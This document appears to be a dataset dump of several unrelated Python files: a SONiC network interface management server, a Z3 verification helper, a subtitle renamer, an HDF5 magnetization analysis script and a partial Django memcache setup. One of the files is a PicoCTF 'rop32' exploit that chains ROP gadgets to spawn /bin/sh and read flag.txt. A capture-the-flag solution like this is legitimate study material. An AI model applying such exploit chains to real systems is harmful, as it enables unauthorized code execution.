else:
for intf in r["interfaces"]["interface"]:
ifname = intf["name"]
if path_list[len(path_list) - 1] == "oper-status":
value = self.get_oper_data(req_xpath)
if value != None:
intf["oper-status"] = value
else:
intf["statistics"] = {}
value = self.get_oper_data(req_xpath)
if value != None:
intf["statistics"][path_list[len(path_list) - 1]] = value
return r
return r
def oper_cb(self, sess, xpath, req_xpath, parent, priv):
logger.debug(
"****************************inside oper-callback******************************"
)
if self.is_usonic_rebooting:
logger.debug("usonic is rebooting. no handling done in oper-callback")
return
if req_xpath.find("/goldstone-interfaces:interfaces") == 0:
return self.interface_oper_cb(req_xpath)
def cache_counters(self):
self.counter_if_dict = {}
for key in self.get_config_db_keys("PORT|Ethernet*"):
ifname = key.split("|")[1]
key = _decode(
self.sonic_db.get(self.sonic_db.COUNTERS_DB, COUNTER_PORT_MAP, ifname)
)
if not key:
continue
tmp_counter_dict = {}
counter_key = COUNTER_TABLE_PREFIX + key
for counter_name in self.counter_dict.keys():
counter_data = _decode(
self.sonic_db.get(
self.sonic_db.COUNTERS_DB, counter_key, counter_name
)
)
tmp_counter_dict[counter_name] = counter_data
self.counter_if_dict[ifname] = tmp_counter_dict
def enable_counters(self):
# This is similar to "counterpoll port enable"
value = {"FLEX_COUNTER_STATUS": "enable"}
self.sonic_configdb.mod_entry("FLEX_COUNTER_TABLE", "PORT", value)
def clear_counters(self, xpath, input_params, event, priv):
logger.debug(
f"clear_counters: xpath: {xpath}, input: {input_params}, event: {event}, priv: {priv}"
)
self.cache_counters()
def pack_defaults_to_redis(self, ifname, leaf_node):
if leaf_node == "mtu":
self.sonic_db.set(
self.sonic_db.CONFIG_DB,
"PORT|" + ifname,
"mtu",
str(self.mtu_default),
)
elif leaf_node == "speed" and not self.is_breakout_port(ifname):
self.sonic_db.set(
self.sonic_db.CONFIG_DB,
"PORT|" + ifname,
"speed",
self.speed_default,
)
def reconcile(self):
self.sess.switch_datastore("running")
intf_data = self.sess.get_data("/goldstone-interfaces:interfaces")
if "interfaces" in intf_data:
intf_list = intf_data["interfaces"]["interface"]
for intf in intf_list:
name = intf.pop("name")
logger.debug(f"interface config: {intf}")
for key in intf:
if key == "ipv4":
if "mtu" in intf[key]:
self.sonic_db.set(
self.sonic_db.CONFIG_DB,
"PORT|" + name,
"mtu",
str(intf[key]["mtu"]),
)
elif key == "description":
self.sonic_db.set(
self.sonic_db.CONFIG_DB,
"PORT|" + name,
"description",
str(intf[key]),
)
elif key == "alias":
self.sonic_db.set(
self.sonic_db.CONFIG_DB,
"PORT|" + name,
"alias",
str(intf[key]),
)
elif key == "admin-status":
self.sonic_db.set(
self.sonic_db.CONFIG_DB,
"PORT|" + name,
"admin_status",
str(intf[key]),
)
elif key == "if-index":
pass
elif key == "breakout":
# Breakout configs are handled above
pass
else:
self.sonic_db.set(
self.sonic_db.CONFIG_DB,
"PORT|" + name,
key,
str(intf[key]),
)
vlan_data = self.sess.get_data("/goldstone-vlan:vlan")
if "vlan" in vlan_data:
logger.debug(f"vlan config: {vlan_data}")
if "VLAN" in vlan_data["vlan"]:
vlan_list = vlan_data["vlan"]["VLAN"]["VLAN_LIST"]
for vlan in vlan_list:
name = vlan.pop("name")
for key in vlan:
if key == "members":
self.sonic_db.set(
self.sonic_db.CONFIG_DB,
"VLAN|" + name,
"members@",
",".join(vlan[key]),
)
else:
self.sonic_db.set(
self.sonic_db.CONFIG_DB,
"VLAN|" + name,
key,
str(vlan[key]),
)
if "VLAN_MEMBER" in vlan_data["vlan"]:
vlan_member_list = vlan_data["vlan"]["VLAN_MEMBER"]["VLAN_MEMBER_LIST"]
for vlan_member in vlan_member_list:
self.sonic_db.set(
self.sonic_db.CONFIG_DB,
"VLAN_MEMBER|"
+ vlan_member["name"]
+ "|"
+ vlan_member["ifname"],
"tagging_mode",
vlan_member["tagging_mode"],
)
for key in self.get_config_db_keys("PORT|Ethernet*"):
ifname = key.split("|")[1]
intf_data = self.sonic_db.get_all(self.sonic_db.CONFIG_DB, key)
intf_keys = [v.decode("ascii") for v in list(intf_data.keys())]
if "admin_status" not in intf_keys:
self.sonic_db.set(
self.sonic_db.CONFIG_DB,
"PORT|" + ifname,
"admin_status",
"down",
)
if "mtu" not in intf_keys:
self.sonic_db.set(
self.sonic_db.CONFIG_DB,
"PORT|" + ifname,
"mtu",
str(self.mtu_default),
)
def update_oper_db(self):
logger.debug("updating operational db")
with self.conn.start_session() as sess:
sess.switch_datastore("operational")
try:
v = sess.get_data("/goldstone-interfaces:*", no_subs=True)
logger.debug(f"interface oper ds before delete: {v}")
# clear the intf operational ds and build it from scratch
sess.delete_item("/goldstone-interfaces:interfaces")
v = sess.get_data("/goldstone-interfaces:*", no_subs=True)
logger.debug(f"interface oper ds after delete: {v}")
except Exception as e:
logger.debug(e)
hash_keys = self.sonic_db.keys(
self.sonic_db.APPL_DB, pattern="PORT_TABLE:Ethernet*"
)
if hash_keys != None:
hash_keys = map(_decode, hash_keys)
for _hash in hash_keys:
ifname = _hash.split(":")[1]
xpath = (
f"/goldstone-interfaces:interfaces/interface[name='{ifname}']"
)
intf_data = self.sonic_db.get_all(self.sonic_db.APPL_DB, _hash)
logger.debug(f"key: {_hash}, value: {intf_data}")
for key in intf_data:
value = _decode(intf_data[key])
key = _decode(key)
if key == "alias" or key == "description":
sess.set_item(f"{xpath}/{key}", value)
elif key == "admin_status":
if value == None:
value = "down"
sess.set_item(f"{xpath}/admin-status", value)
breakout_parent_dict = {}
for key in self.get_config_db_keys("PORT|Ethernet*"):
ifname = key.split("|")[1]
intf_data = self.sonic_db.get_all(self.sonic_db.CONFIG_DB, key)
logger.debug(f"config db entry: key: {key}, value: {intf_data}")
xpath = f"/goldstone-interfaces:interfaces/interface[name='{ifname}']"
xpath_subif_breakout = f"{xpath}/breakout"
# TODO use the parent leaf to detect if this is a sub-interface or not
# using "_1" is vulnerable to the interface naming schema change
if not ifname.endswith("_1") and ifname.find("_") != -1:
_ifname = ifname.split("_")
tmp_ifname = _ifname[0] + "_1"
if tmp_ifname in breakout_parent_dict.keys():
breakout_parent_dict[tmp_ifname] = (
breakout_parent_dict[tmp_ifname] + 1
)
else:
breakout_parent_dict[tmp_ifname] = 1
logger.debug(
f"ifname: {ifname}, breakout_parent_dict: {breakout_parent_dict}"
)
sess.set_item(f"{xpath_subif_breakout}/parent", tmp_ifname)
for key in intf_data:
value = _decode(intf_data[key])
key = _decode(key)
if key == "mtu":
sess.set_item(f"{xpath}/goldstone-ip:ipv4/{key}", value)
elif (
key != "index"
and key != "phys-address"
and key != "admin_status"
and key != "alias"
and key != "description"
and key != "breakout"
):
sess.set_item(f"{xpath}/{key}", value)
for key in breakout_parent_dict:
xpath_parent_breakout = (
f"/goldstone-interfaces:interfaces/interface[name='{key}']/breakout"
)
speed = self.sonic_db.get(
self.sonic_db.CONFIG_DB, "PORT|" + key, "speed"
)
logger.debug(f"key: {key}, speed: {speed}")
if speed != None:
sess.set_item(
f"{xpath_parent_breakout}/num-channels",
breakout_parent_dict[key] + 1,
)
sess.set_item(
f"{xpath_parent_breakout}/channel-speed",
speed_to_yang_val(speed),
)
else:
logger.warn(
f"Breakout interface {key} does not have a speed attribute in Redis"
)
hash_keys = self.sonic_db.keys(
self.sonic_db.CONFIG_DB, pattern="VLAN|Vlan*"
)
# clear the VLAN operational ds and build it from scratch
try:
v = sess.get_data("/goldstone-vlan:*", no_subs=True)
logger.debug(f"VLAN oper ds before delete: {v}")
# clear the intf operational ds and build it from scratch
sess.delete_item("/goldstone-vlan:vlan")
v = sess.get_data("/goldstone-vlan:*", no_subs=True)
logger.debug(f"VLAN oper ds after delete: {v}")
except Exception as e:
logger.debug(e)
if hash_keys != None:
hash_keys = map(_decode, hash_keys)
for _hash in hash_keys:
name = _hash.split("|")[1]
xpath = f"/goldstone-vlan:vlan/VLAN/VLAN_LIST[name='{name}']"
vlanDATA = self.sonic_db.get_all(self.sonic_db.CONFIG_DB, _hash)
for key in vlanDATA:
logger.debug(f"vlan config: {vlanDATA}")
value = _decode(vlanDATA[key])
key = _decode(key)
if key == "members@":
member_list = value.split(",")
for member in member_list:
sess.set_item(f"{xpath}/members", member)
else:
sess.set_item(f"{xpath}/{key}", value)
hash_keys = self.sonic_db.keys(
self.sonic_db.CONFIG_DB, pattern="VLAN_MEMBER|Vlan*|Ethernet*"
)
if hash_keys != None:
hash_keys = map(_decode, hash_keys)
for _hash in hash_keys:
name, ifname = _hash.split("|")[1:]
xpath = f"/goldstone-vlan:vlan/VLAN_MEMBER/VLAN_MEMBER_LIST[name='{name}'][ifname='{ifname}']"
member_data = self.sonic_db.get_all(self.sonic_db.CONFIG_DB, _hash)
for key in member_data:
value = _decode(member_data[key])
key = _decode(key)
sess.set_item(f"{xpath}/{key}", value)
try:
sess.apply_changes(timeout_ms=5000, wait=True)
except sysrepo.SysrepoTimeOutError as e:
logger.warn(f"update oper ds timeout: {e}")
sess.apply_changes(timeout_ms=5000, wait=True)
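# Redis keyspace-notification handler: converts PORT_TABLE oper_status changes
# into goldstone-interfaces link-state YANG notifications, skipping events whose
# oper_status did not change since the last one seen for that interface.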
def event_handler(self, msg):
try:
key = _decode(msg["channel"])
key = key.replace("__keyspace@0__:", "")
name = key.replace("PORT_TABLE:", "")
oper_status = _decode(
self.sonic_db.get(self.sonic_db.APPL_DB, key, "oper_status")
)
if name in self.notif_if:
curr_oper_status = self.notif_if[name]
else:
curr_oper_status = "unknown"
if curr_oper_status == oper_status:
return
eventname = "goldstone-interfaces:interface-link-state-notify-event"
notif = {
eventname: {
"ifname": name,
"oper-status": oper_status,
}
}
with self.conn.start_session() as sess:
ly_ctx = sess.get_ly_ctx()
n = json.dumps(notif)
logger.info(f"Notification: {n}")
dnode = ly_ctx.parse_data_mem(n, fmt="json", notification=True)
sess.notification_send_ly(dnode)
self.notif_if[name] = oper_status
except Exception as exp:
logger.error(exp)
pass
async def start(self):
logger.debug(
"****************************inside start******************************"
)
self.sonic_db.connect(self.sonic_db.CONFIG_DB)
self.sonic_db.connect(self.sonic_db.APPL_DB)
self.sonic_db.connect(self.sonic_db.COUNTERS_DB)
logger.debug(
"****************************reconciliation******************************"
)
self.sess.switch_datastore("running")
with self.sess.lock("goldstone-interfaces"):
with self.sess.lock("goldstone-vlan"):
# Calling breakout_update_usonic() is mandatory before initial reconcile
# process, as gssouth-sonic will replace the interface names properly during
# init if they have been modified.
breakout_dict = {}
is_updated = await self.breakout_update_usonic(breakout_dict)
if is_updated:
await self.watch_pods()
else:
self.cache_counters()
self.reconcile()
self.update_oper_db()
self.is_usonic_rebooting = False
self.sess.switch_datastore("running")
self.sess.subscribe_module_change(
"goldstone-interfaces",
None,
self.intf_change_cb,
asyncio_register=True,
)
self.sess.subscribe_module_change(
"goldstone-vlan", None, self.vlan_change_cb
)
logger.debug(
"**************************after subscribe module change****************************"
)
self.sess.subscribe_oper_data_request(
"goldstone-interfaces",
"/goldstone-interfaces:interfaces",
self.oper_cb,
oper_merge=True,
)
self.sess.subscribe_rpc_call(
"/goldstone-interfaces:clear_counters",
self.clear_counters,
)
cache = redis.Redis(REDIS_SERVICE_HOST, REDIS_SERVICE_PORT)
pubsub = cache.pubsub()
pubsub.psubscribe(
**{"__keyspace@0__:PORT_TABLE:Ethernet*": self.event_handler}
)
pubsub.run_in_thread(sleep_time=2)
return []
def main():
async def _main():
loop = asyncio.get_event_loop()
stop_event = asyncio.Event()
loop.add_signal_handler(signal.SIGINT, stop_event.set)
loop.add_signal_handler(signal.SIGTERM, stop_event.set)
server = Server()
try:
tasks = await server.start()
tasks.append(stop_event.wait())
done, pending = await asyncio.wait(
tasks, return_when=asyncio.FIRST_COMPLETED
)
logger.debug(f"done: {done}, pending: {pending}")
for task in done:
e = task.exception()
if e:
raise e
finally:
server.stop()
parser = argparse.ArgumentParser()
parser.add_argument("-v", "--verbose", action="store_true")
args = parser.parse_args()
fmt = "%(levelname)s %(module)s %(funcName)s l.%(lineno)d | %(message)s"
if args.verbose:
logging.basicConfig(level=logging.DEBUG, format=fmt)
hpack = logging.getLogger("hpack")
hpack.setLevel(logging.INFO)
k8s = logging.getLogger("kubernetes_asyncio.client.rest")
k8s.setLevel(logging.INFO)
sysrepo.configure_logging(py_logging=True)
else:
logging.basicConfig(level=logging.INFO, format=fmt)
asyncio.run(_main())
if __name__ == "__main__":
main()
| 41.191283 | 114 | 0.492476 |
b648e09391a05b2c9e66d8b92aca8dc6fc2f228e | 1,599 | py | Python | PicoCTF 2019/Binary Exploitation/rop32/exploit.py | p-g-krish/CTF-Writeups | 05ad6a9ecbc19ceb8890f4581dfee36f16d164aa | [
"MIT"
] | 51 | 2018-06-26T09:49:42.000Z | 2019-09-14T00:06:35.000Z | PicoCTF 2019/Binary Exploitation/rop32/exploit.py | p-g-krish/CTF-Writeups | 05ad6a9ecbc19ceb8890f4581dfee36f16d164aa | [
"MIT"
] | 1 | 2018-06-29T18:40:59.000Z | 2018-07-09T20:29:41.000Z | PicoCTF 2019/Binary Exploitation/rop32/exploit.py | p-g-krish/CTF-Writeups | 05ad6a9ecbc19ceb8890f4581dfee36f16d164aa | [
"MIT"
] | 22 | 2019-10-03T14:52:43.000Z | 2022-01-17T08:55:10.000Z | #!/usr/bin/env python2
from pwn import *
from struct import pack
BASE = 0x08048000
pop_esi = BASE+0x00001708
pop_edi = BASE+0x00001adb
pop_ecx_ebx = BASE+0x00026e92
mov_ebx_eax_call_esi = BASE+0x0005b19c
add_edi_ebx_jmp_edi = BASE+0x00045f38
pop_ebx = BASE+0x000001c9
pop_eax = BASE+0x00060e36
int_0x80 = BASE+0x000277a0
mov_edi_ebx_pop_ebx_esi_edi = BASE+0x00057471
add_edi_esi = BASE+0x00086edc
jmp_edi = BASE+0x000237f1
something_got_plt = 0x080DA004
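# Rough outline, inferred from the gadget names: gadget addresses containing bad
# bytes (newlines) are supplied as two halves and recombined with an add gadget
# before jumping; a .got.plt slot is overwritten with the pop_edi stub so that the
# "call esi" gadget returns control to the chain; ebx is loaded from eax (assumed
# to still point at the "/bin/sh" buffer), eax is set to 0xb (execve) and int 0x80
# is invoked with ecx zeroed.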
payload = "/bin/sh\x00AAAAAAAABBBBCCCCDDDD"
payload += pack("<I",pop_edi)
payload += pack("<I",something_got_plt)
payload += pack("<I",pop_ebx)
payload += pack("<I",pop_edi)
payload += pack("<I",mov_edi_ebx_pop_ebx_esi_edi)#write pop_edi gadget in .got.plt
payload += pack("<I",0)
payload += pack("<I",0)
payload += pack("<I",0)
payload += pack("<I",pop_esi)
payload += pack("<I",something_got_plt) #esi=&(pop_edi)
payload += pack("<I",pop_ecx_ebx)
payload += pack("<II",0,0)#ecx=0,ebx=0
p1 = (mov_ebx_eax_call_esi) / 2 # contains newline
p2 = (mov_ebx_eax_call_esi) - p1
payload += pack("<I",pop_edi)
payload += pack("<I",p1)
payload += pack("<I",pop_ebx)
payload += pack("<I",p2)
payload += pack("<I",add_edi_ebx_jmp_edi) # -> mov_ebx_eax_call_esi -> pop_edi
p1 = (pop_eax) / 2 # contains newline
p2 = (pop_eax) - p1
payload += pack("<I",pop_edi)
payload += pack("<I",p1)
payload += pack("<I",pop_esi)
payload += pack("<I",p2)
payload += pack("<I",add_edi_esi)
payload += pack("<I",jmp_edi)
payload += pack("<I",0xb) # execve
payload += pack("<I",int_0x80)
p = process("./vuln")
p.sendline(payload)
p.sendline("cat flag.txt")
p.interactive() | 30.75 | 82 | 0.709193 |
60ca7b24fcd10f8ed896ba4dc12cdd0fc8db7848 | 1,841 | py | Python | utils/BM-8-Model-Functions.py | anonymous-authorss/Fairify | f698ae0d283414fb2c08aa4ae237da4f47d01f77 | [
"MIT"
] | null | null | null | utils/BM-8-Model-Functions.py | anonymous-authorss/Fairify | f698ae0d283414fb2c08aa4ae237da4f47d01f77 | [
"MIT"
] | null | null | null | utils/BM-8-Model-Functions.py | anonymous-authorss/Fairify | f698ae0d283414fb2c08aa4ae237da4f47d01f77 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# reinterpret network symbolically using z3 variables.
import sys
from z3 import *
import numpy as np
import pandas as pd
import collections
import time
import datetime
from utils.verif_utils import *
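# ground_net recomputes the forward pass with explicit Python loops as a ground
# truth; note it reads `w`, `b` and relu as globals (presumably provided by the
# wildcard import above or by the caller), unlike net()/z3_net below, which take
# w and b as arguments.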
def ground_net(x):
layer_outs = []
for i in range(len(w)):
layer = []
for j in range(len(w[i][0])):
sum = 0
for k in range(len(x)):
sum += x[k] * w[i][k][j]
sum += b[i][j]
layer.append(sum)
layer = np.asarray(layer, dtype=np.float64)
y = layer if i == len(w)-1 else relu(layer)
layer_outs.append(y)
x = y
return y
def layer_net(x, w, b):
layers = []
for i in range(len(w)):
x1 = w[i].T @ x + b[i]
y1 = x1 if i == len(w)-1 else relu(x1)
layers.append(y1)
x = y1
return layers
def net(x, w, b):
# for i in range(len(w)):
# x1 = w[i].T @ x + b[i]
# y1 = x1 if i == len(w)-1 else relu(x1)
# x = y1
x1 = w[0].T @ x + b[0]
y1 = relu(x1)
x2 = w[1].T @ y1 + b[1]
y2 = relu(x2)
x3 = w[2].T @ y2 + b[2]
y3 = relu(x3)
x4 = w[3].T @ y3 + b[3]
y4 = relu(x4)
x5 = w[4].T @ y4 + b[4]
y5 = relu(x5)
x6 = w[5].T @ y5 + b[5]
# y6 = softmax(y1)
return x6
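# z3_net mirrors net() above but converts the inputs with ToReal so that the same
# layer arithmetic is expressed over Z3 terms and can be asserted symbolically by
# the verifier.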
def z3_net(x, w, b):
fl_x = np.array([FP('fl_x%s' % i, Float32()) for i in range(16)])
for i in range(len(x)):
fl_x[i] = ToReal(x[i])
x1 = w[0].T @ fl_x + b[0]
#x1 = w[0].T @ x + b[0]
y1 = z3Relu(x1)
x2 = w[1].T @ y1 + b[1]
y2 = z3Relu(x2)
x3 = w[2].T @ y2 + b[2]
y3 = z3Relu(x3)
x4 = w[3].T @ y3 + b[3]
y4 = z3Relu(x4)
x5 = w[4].T @ y4 + b[4]
y5 = z3Relu(x5)
x6 = w[5].T @ y5 + b[5]
# y6 = softmax(y1)
return x6
| 18.979381 | 71 | 0.468224 |
022985b790c3b3b81f240adb89fd27d63072c635 | 1,687 | py | Python | SubtitleTools.py | icyplayer/AnimeTools | 9159e5899c5263876b652f0e3b83112a4e9b58ce | [
"MIT"
] | null | null | null | SubtitleTools.py | icyplayer/AnimeTools | 9159e5899c5263876b652f0e3b83112a4e9b58ce | [
"MIT"
] | null | null | null | SubtitleTools.py | icyplayer/AnimeTools | 9159e5899c5263876b652f0e3b83112a4e9b58ce | [
"MIT"
] | null | null | null | """
Unzip subtitle zip files and rename them to match the video file name,
so that the video player auto-loads them when the video file is opened.
Works under Python 2.7.10
"""
import os
import sys
import zipfile
#unzip
def unzip(fileName):
zfile = zipfile.ZipFile(fileName,'r')
for filename in zfile.namelist():
data = zfile.read(filename)
with open(filename, 'w+b') as file:
file.write(data)
print('%s unzipped' % fileName)
#unzip files under path, ~/ as default
def unzipFilePath(dir = os.getcwd()):
list = os.listdir(dir)
for fileName in list:
if fileName.split('.uni_sub.')[-1] == 'zip':
unzip(fileName)
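# Rename e.g. "Episode01.uni_gb.ass" to "Episode01.ass" so the subtitle base name
# matches the video file (the episode name here is only an illustrative example).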
def renameFileUnderPath(dir = os.getcwd()):
list = os.listdir(dir)
for fileName in list:
nameList = fileName.split('.')
if nameList[-1] == 'ass':
if nameList[1] == 'uni_gb':
newName = nameList[0] + '.' + nameList[-1]
os.renames(fileName, nameList[0]+'.'+'ass')
print('renamed: %s => %s' % (fileName, newName))
if __name__ == '__main__':
# print('Start unzipping...')
# unzipFilePath()
print('Start renaming...')
renameFileUnderPath()
print('Finished!')
# # ref: http://www.sharejs.com/codes/python/210
# #zip all files under folder
# f = zipfile.ZipFile('archive.zip','w',zipfile.ZIP_DEFLATED)
# startdir = "c:\\mydirectory"
# for dirpath, dirnames, filenames in os.walk(startdir):
# for filename in filenames:
# f.write(os.path.join(dirpath,filename))
# f.close()
#zip
# import zipfile
# f = zipfile.ZipFile('archive.zip','w',zipfile.ZIP_DEFLATED)
# f.write('file_to_add.py')
# f.close()
| 26.777778 | 64 | 0.615886 |
828c3b8b442160aab2ae07be4cd78118134350e5 | 7,976 | py | Python | hdf5_test.py | Morrighan89/Python-In-The-Lab_Project | dadcb6618eb6fcc39bc4812918ca0c56c22b4bd3 | [
"MIT"
] | 1 | 2017-05-03T17:56:02.000Z | 2017-05-03T17:56:02.000Z | hdf5_test.py | Morrighan89/Python-In-The-Lab_Project | dadcb6618eb6fcc39bc4812918ca0c56c22b4bd3 | [
"MIT"
] | null | null | null | hdf5_test.py | Morrighan89/Python-In-The-Lab_Project | dadcb6618eb6fcc39bc4812918ca0c56c22b4bd3 | [
"MIT"
] | null | null | null | import glob, os, sys
import h5py
import numpy as np
import matplotlib.pyplot as plt
"""
Basic script: opens an HDF5 file from my simulation, computes the hysteresis loop,
saves the data to a file with a specific naming pattern and finally plots the calculated loop.
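calcoloMagnMedia below returns, for one time step, the volume-weighted average of the
magnetization projected on the u, v and w directions together with the applied field.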
"""
def calcoloMagnMedia(time,file,Volumes):
data=np.array([])
dataset_Magnet = '/Magnetizzazione%s/Val'%(time)
dataset_Hext = '/Hext%s/Val'%(time)
#print(dataset_Magnet)
datasetM = file[dataset_Magnet]
#print(datasetM.shape, isinstance(datasetM,h5py.Dataset))
#magnetizzazione = np.matrix(datasetM[0:103,:])
magnetizzazione = np.matrix(datasetM[()])
#print(np.shape(magnetizzazione))
#proiez=np.dot(np.dot(magnetizzazione,versore),versoreT)
proiezu = np.dot(magnetizzazione, versoreu)
proiezv = np.dot(magnetizzazione, versorev)
proiezw = np.dot(magnetizzazione, versorew)
#print(proiez,i, "\n")
datasetH = file[dataset_Hext]
#print(datasetH.shape, isinstance(datasetH,h5py.Dataset))
#Hext= datasetH[0:103,0]
Hext= datasetH[(0)]
Hext = np.dot(np.dot(Hext, versoreu), np.reshape((1, 0, 0), (1, 3))) + np.dot(np.dot(Hext, versorev),
np.reshape((0, 1, 0),
(1, 3))) + np.dot(
np.dot(Hext, versorew), np.reshape((0, 0, 1), (1, 3)))
#np.savetxt("uffa",proiezu)
mediau=np.average(proiezu,weights=Volumes)
mediav=np.average(proiezv,weights=Volumes)
mediaw=np.average(proiezw,weights=Volumes)
data=np.append(data, [Hext[0], mediau, Hext[1], mediav, Hext[2], mediaw])
return data
def calcoloMagnMediaDisks(time,file,Volumes,numDisks):
data=np.array([])
dataset_Magnet = '/Magnetizzazione%s/Val'%(time)
dataset_Hext = '/Hext%s/Val'%(time)
#print(dataset_Magnet)
datasetM = file[dataset_Magnet]
#print(datasetM.shape, isinstance(datasetM,h5py.Dataset))
#magnetizzazione = np.matrix(datasetM[0:103,:])
magnetizzazione = np.matrix(datasetM[()])
#print(np.shape(magnetizzazione))
#proiez=np.dot(np.dot(magnetizzazione,versore),versoreT)
proiezu = np.dot(magnetizzazione, versoreu)
proiezv = np.dot(magnetizzazione, versorev)
proiezw = np.dot(magnetizzazione, versorew)
#print(Volumes[9:12], "\n")
datasetH = file[dataset_Hext]
#print(datasetH.shape, isinstance(datasetH,h5py.Dataset))
#Hext= datasetH[0:103,0]
Hext= datasetH[(0)]
Hext = np.dot(np.dot(Hext, versoreu), np.reshape((1, 0, 0), (1, 3))) + np.dot(np.dot(Hext, versorev),
np.reshape((0, 1, 0),
(1, 3))) + np.dot(
np.dot(Hext, versorew), np.reshape((0, 0, 1), (1, 3)))
#np.savetxt("uffa",proiezu)
numElem=int(np.size(magnetizzazione,0)/numDisks)
for i in range(1, numDisks+1):
mediau=np.average(proiezu[(i-1)*numElem : i*numElem-1],weights=Volumes[(i-1)*numElem:i*numElem-1])
mediav=np.average(proiezv[(i-1)*numElem : i*numElem-1],weights=Volumes[(i-1)*numElem:i*numElem-1])
mediaw=np.average(proiezw[(i-1)*numElem : i*numElem-1],weights=Volumes[(i-1)*numElem:i*numElem-1])
data=np.append(data, [Hext[0], mediau, Hext[1], mediav, Hext[2], mediaw])
return data
def calcoloEnergia(time,file,Volumes):
data=np.array([])
dataset_Magnet = '/Magnetizzazione%s/Val'%(time)
dataset_Hext = '/Hext%s/Val'%(time)
dataset_Hms = '/Hms%s/Val'% (time)
#print(dataset_Magnet)
datasetM = file[dataset_Magnet]
data_hms= file[dataset_Hms]
hms=np.matrix(data_hms[()])
data_Hext = file[dataset_Hms]
hext = np.matrix(data_Hext[()])
# magnetizzazione = np.matrix(datasetM[0:103,:])
magnetizzazione = np.matrix(datasetM[()])
enHms=-2*np.pi*1.e-7*np.einsum('ij, ij->i', hms, magnetizzazione)
enHms =np.reshape(enHms, (-1, 1))
enHms= np.average(enHms,weights=Volumes)
enZee=-4*np.pi*1.e-7*np.einsum('ij, ij->i',magnetizzazione, hext)
enZee =np.reshape(enZee, (-1, 1))
enZee= np.average(enZee,weights=Volumes)
#print(proiez,i, "\n")
datasetH = file[dataset_Hext]
data=np.append(data,[time, enHms,enZee])
return data
if __name__ == '__main__':
#mainDir = "W:\\Micro\\Riccardo\\cfr2d3d_3d_random\\2d3d"
mainDir = "S:\\Alessandra\\2d3d\\Thermal"
#mainDir= "W:\\Micro\\2d3d\\SquarePerCfr3D"
#mainDir = "W:\\Micro\\Riccardo\\cfr2d3d_3d_random\\approx_noapprox"
#mainDir = "W:\\Micro\\2d3d\\dot150\\n54"
#mainDir = "W:\\Micro\\FePd\\d250"
filename= "temp150n30c27d3cont_1.h5"
outputfile=filename.split(".", 1)[0]+".dat"
outputHystfile=outputfile.split("_", 1)[0]+"_Hyst_"+outputfile.split("_", 1)[1]
outputEnergyfile=outputfile.split("_", 1)[0]+"_Energy_"+outputfile.split("_", 1)[1]
print(outputfile)
hdf5_file_name = os.path.join(mainDir, filename)
dataset_numTimeSteps ='/Timesteps/TimeSteps#'
dataset_Volumes ='/Volumes'
event_number = 5
versoreu = np.array([[1],[0],[0]])
versorev = np.array([[0], [1], [0]])
versorew = np.array([[0],[0],[1]])
file = h5py.File(hdf5_file_name, 'r') # 'r' means that hdf5 file is open in read-only mode
datasetTime=file[dataset_numTimeSteps]
datasetVol=file[dataset_Volumes]
numTimeSteps= datasetTime[(0)]
print(numTimeSteps)
mediau= np.array([])
mediav= np.array([])
mediaw= np.array([])
Hexternal=np.array([])
outputdata=np.array([])
outputdata2 = np.array([])
outputEner=np.array([])
Volumes=np.array(datasetVol[()])
numDisks=30
# for i in range(1,numTimeSteps):
# #outputdata=np.append(outputdata,calcoloMagnMedia(int(i),file,Volumes))
# #outputEner = np.append(outputEner, calcoloEnergia(int(i), file, Volumes))
# outputdata = np.append(outputdata, calcoloMagnMediaDisks(int(i), file, Volumes,numDisks))
# print(np.shape(outputdata) , "np.shape outputdata")
#
# outputdata = np.reshape(outputdata, (-1, 6*(numDisks)))
# #outputEner = np.reshape(outputEner, (-1, 3))
# #np.savetxt(os.path.join(mainDir, outputHystfile), outputdata, fmt='%26.18e')
# #np.savetxt(os.path.join(mainDir, outputEnergyfile), outputEner, fmt='%26.18e')
# for i in range(1, numDisks+1):
# outputHystfile = outputfile.split("_", 1)[0] + "_Hyst_" + str(i) +"_"+ outputfile.split("_", 1)[1]
# np.savetxt(os.path.join(mainDir, outputHystfile), outputdata[:, (i-1)*6:i*6], fmt='%26.18e')
for i in range(1,numTimeSteps):
outputdata2=np.append(outputdata2,calcoloMagnMedia(int(i),file,Volumes))
#outputEner = np.append(outputEner, calcoloEnergia(int(i), file, Volumes))
#outputdata = np.append(outputdata, calcoloMagnMediaDisks(int(i), file, Volumes,numDisks))
print(np.shape(outputdata2) , "np.shape outputdata")
outputdata2 = np.reshape(outputdata2, (-1, 6))
#outputEner = np.reshape(outputEner, (-1, 3))
#np.savetxt(os.path.join(mainDir, outputHystfile), outputdata, fmt='%26.18e')
#np.savetxt(os.path.join(mainDir, outputEnergyfile), outputEner, fmt='%26.18e')
outputHystfile = outputfile.split("_", 1)[0] + "_Hyst_" + outputfile.split("_", 1)[1]
np.savetxt(os.path.join(mainDir, outputHystfile), outputdata2, fmt='%26.18e')
file.close()
fig = plt.figure()
ax = fig.add_subplot(111)
lb = "u"
ax.plot(outputdata2[1:-1, 0]/1000, outputdata2[1:-1, 1]/1000, label=lb)
lb = "v"
ax.plot(outputdata2[1:-1, 2]/1000, outputdata2[1:-1, 3]/1000, label=lb)
lb = "w"
ax.plot(outputdata2[1:-1, 4]/1000, outputdata2[1:-1, 5]/1000, label=lb)
ax.legend(numpoints=1)
ax.grid(True)
#plt.plot(Hexternal, mediau)
plt.show()
| 41.113402 | 140 | 0.624498 |
df8ed9fef65fcdc561976903b93466525ed08ade | 8,667 | py | Python | base/core/library/cache/__init__.py | B-ROY/TESTGIT | 40221cf254c90d37d21afb981635740aebf11949 | [
"Apache-2.0"
] | 2 | 2017-12-02T13:58:30.000Z | 2018-08-02T17:07:59.000Z | base/core/library/cache/__init__.py | B-ROY/TESTGIT | 40221cf254c90d37d21afb981635740aebf11949 | [
"Apache-2.0"
] | null | null | null | base/core/library/cache/__init__.py | B-ROY/TESTGIT | 40221cf254c90d37d21afb981635740aebf11949 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
__author__ = 'zen'
import logging
import time
import functools
import hashlib
import inspect
import pickle
import pylibmc
from django.conf import settings
from base.core.util import dateutils
# print settings.memcache_settings
memcache_settings = settings.memcache_settings
func_cache = pylibmc.Client(
memcache_settings["func_cache"],
binary=True,
behaviors={"tcp_nodelay": True, "ketama": True}
)
page_cache = pylibmc.Client(
memcache_settings["page_cache"],
binary=True,
behaviors={"tcp_nodelay": True, "ketama": True}
)
fragment_cache = pylibmc.Client(
memcache_settings["fragment_cache"],
binary=True,
